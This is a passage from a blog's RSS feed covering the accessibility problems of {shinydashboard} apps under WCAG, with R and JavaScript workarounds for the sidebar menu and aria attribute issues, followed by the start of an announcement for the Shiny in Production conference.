&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(x),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which, whilst removing the issue reported by Lighthouse, unfortunately
gives us another, less immediately visible problem:
the shiny input binding for the tab that is currently in view
is now broken and always returns NULL. So we rethink and come up
with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tab_input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;real_menu &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(x, tab_input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(real_menu),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which doesn’t work either. This time the input fires twice instead of once on start-up of the
application, and it’s not immediately
clear why that is the case. My imaginary application needs this
feature, so we implement a hack for it and wrap it up in our own
function so that it can be reused (it’s not ideal but it works… sort
of; it definitely breaks with shiny modules though).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;accessible_menu &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(bad_menu) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tab_input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;function customMenuHandleClick(e) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; let n = $(e.target).parents(&amp;#39;ul.sidebar-menu&amp;#39;).find(&amp;#39;li.active:not(.treeview)&amp;#39;).children(&amp;#39;a&amp;#39;)[0].dataset.value;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; doSomethingWith(n);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;function doSomethingWith(val) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; Shiny.setInputValue(&amp;#39;sidebarMenu&amp;#39;, val);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;$(document).ready(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; function() {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; $(&amp;#39;ul.sidebar-menu li&amp;#39;).click(customMenuHandleClick)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bad_menu&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children[&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[length&lt;/span&gt;(bad_menu&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;children)]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; real_menu &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(bad_menu, tab_input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; real_menu
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarMenu&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sidebarMenu&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;menuItem&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home page&amp;#34;&lt;/span&gt;, tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinydashboardPlus&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;My App&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sidebar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;accessible_menu&lt;/span&gt;(x)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;html&lt;/span&gt;(lang &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;en&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;dashboardBody&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItems&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tabItem&lt;/span&gt;(tabName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Dashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;Use or develop a different navigation structure for the app&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ul&gt;
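&lt;p&gt;Before reaching for Lighthouse, a quick check in R can flag this kind of problem on the tag object itself. The sketch below uses a hypothetical helper, &lt;code&gt;non_li_children()&lt;/code&gt;, on a hand-built list made with {htmltools}. It only inspects direct children that are tag objects, so children nested inside plain R lists (as some UI functions produce) would need flattening first.&lt;/p&gt;

```r
library(htmltools)

# Hypothetical helper: names of direct child tags that are not allowed
# inside a list element (anything other than li, script or template)
non_li_children = function(list_tag) {
  allowed = c("li", "script", "template")
  is_tag = vapply(list_tag$children, inherits, logical(1), what = "shiny.tag")
  child_tags = list_tag$children[is_tag]
  child_names = vapply(child_tags, function(child) child$name, character(1))
  child_names[!(child_names %in% allowed)]
}

# A hand-built menu that mimics the problem: a div sitting next to the li
bad_menu = tags$ul(
  class = "sidebar-menu",
  tags$li(tags$a(href = "#shiny-tab-Home", "Home page")),
  tags$div(id = "sidebarMenu")
)

# The same menu without the rogue div
good_menu = tags$ul(
  class = "sidebar-menu",
  tags$li(tags$a(href = "#shiny-tab-Home", "Home page"))
)

offenders_bad = non_li_children(bad_menu)
offenders_good = non_li_children(good_menu)
```

&lt;p&gt;An empty result means the direct children look fine. It says nothing about whether the inputs still work, which is the harder half of the problem described above.&lt;/p&gt;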
&lt;h4 id="aria--attributes-do-not-match-their-roles"&gt;[aria-*] attributes do not match their roles&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The issue:&lt;/strong&gt; Each ARIA role supports a specific subset of aria-*
attributes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accessibility problem:&lt;/strong&gt; Users of screen readers and other
assistive technologies need information about the behavior and
purpose of controls on your web page. Built-in HTML controls like
buttons and radio groups come with that information built in. For
custom controls you create, however, you must provide the
information with ARIA roles and attributes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;A solution?:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is caused by the &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; tag in the &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt; for the menu item.
This is potentially somewhat confusing because the generated HTML
when viewing the output of the relevant R code is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;but the &lt;code&gt;aria-*&lt;/code&gt; attributes are added in the browser by the JavaScript bundle
that also controls other behaviour of the {shinydashboard}
library. After launching the application, the tag becomes&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;a&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;#shiny-tab-Home&amp;#34;&lt;/span&gt; data-toggle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;tab&amp;#34;&lt;/span&gt; data-value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Home&amp;#34;&lt;/span&gt; aria-expanded&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt; tabindex&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; aria-selected&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;Home page&amp;lt;/&lt;span style="color:#7ee787"&gt;span&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;a&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So we are now in a state where, even though we have started to patch the functions
generating the UI code, things are happening outside of our direct
control, which makes it extremely difficult to force this package to
comply with WCAG. And we are completely ignoring all the things that
Lighthouse doesn’t pick up on. To name some:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The header section includes an empty list
(&lt;code&gt;&amp;lt;ul class=&amp;quot;nav navbar-nav&amp;quot;&amp;gt;&amp;lt;/ul&amp;gt;&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;The “Toggle Navigation” component is correctly labelled, and is
correctly exposed as a button. However, it is missing the
aria-expanded attribute.&lt;/li&gt;
&lt;li&gt;Each of the navigation menu items is
exposed as a link but, in reality, these are tabs (as they don’t
direct the user to other pages; instead, only the main content
section changes).&lt;/li&gt;
&lt;li&gt;The container for the main content section is unnecessarily
&lt;code&gt;focusable&lt;/code&gt;, as &lt;code&gt;tabindex=&amp;quot;0&amp;quot;&lt;/code&gt; is applied to the related &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;
element (&lt;code&gt;&amp;lt;div id=&amp;quot;shiny-tab-Home&amp;quot; role=&amp;quot;tabpanel&amp;quot; tabindex=&amp;quot;0&amp;quot;&amp;gt;&lt;/code&gt;).
Only functional/operable content should be focusable using the
keyboard.&lt;/li&gt;
&lt;li&gt;Navigation menu content is still readable by screen readers even
when the related content is in a collapsed (visibly hidden) state.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="so-scrap-shiny"&gt;So scrap {shiny}?&lt;/h2&gt;
&lt;p&gt;Is {shiny} a terrible solution when wanting to build an accessible web
app then? Well, not necessarily. At the end of the day, all {shiny} does
is wrap front end content in R functions. You can still write R
functions that will generate WCAG compliant HTML. But… and I think it is
quite a big but, making a {shiny} application WCAG compliant requires a
bit more thought and attention, and almost certainly means not using all
your favourite libraries. It was ignored in the previous section, but
{DT} and {plotly}, both mentioned as great packages for common {shiny}
app components, also do not give WCAG compliant markup. {plotly} in
particular is very problematic in this arena: it is still one of my favourite
plotting solutions for R, but it is not amenable to an accessible application.
In short, you will have to roll your own a bit more.&lt;/p&gt;
&lt;p&gt;There are tools to help you assess your application. Lighthouse in the
browser was used in the above discussion; there are other tools like
Koa11y for generating reports, which I find give more info, and there is a
{shinya11y} R package which aims to help specifically with {shiny}.
Having said that, none of these tools are perfect.&lt;/p&gt;
&lt;h2 id="how-does-this-story-end"&gt;How does this story end?&lt;/h2&gt;
&lt;p&gt;In summary, it is entirely possible to create fully accessible {shiny}
applications. However, I think there is a lot of work to be done by
developers of packages for {shiny} to ease the burden somewhat, as at
present a lot of my favourite packages leave me with too much hacking to
do to solve the problem. For the particular project referenced in the
opening remarks, the requirement to be WCAG compliant plus some
additional constraints meant that an alternative solution based on
{plumber} and a separate front end was developed. In my initial report I
remarked to the client that a {shiny} solution could be developed and I
maintain that view now; however, I am a little bit happy that we opted
for an alternative. I do love {shiny} and will continue to use it a lot,
but it is not the only solution we have available to us. Until it
becomes a little easier to create accessible applications with some
complexity to them, I can’t strongly recommend it for every application.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production (2022)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-conference/</link><pubDate>Fri, 13 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-conference/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="save-the-date-6th-7th-october"&gt;Save the Date: 6th-7th October&lt;/h3&gt;
&lt;p&gt;This October, Jumping Rivers will be holding our in-person Shiny in Production conference! Hosted in the centre of Newcastle Upon Tyne, UK, this conference will delve into the world of {shiny} and other web based R packages.&lt;/p&gt;
&lt;p&gt;We have an excellent line up of expert speakers for you from a wide range of industries, as well as an afternoon of workshops hosted by our very own Jumping Rivers R pros.&lt;/p&gt;
&lt;p&gt;Whether you&amp;rsquo;re a seasoned {shiny} user who wants to network and share knowledge, someone who&amp;rsquo;s just getting started and wants to learn from the experts, or anybody in between, if you&amp;rsquo;re interested in {shiny}, this conference is for you.&lt;/p&gt;
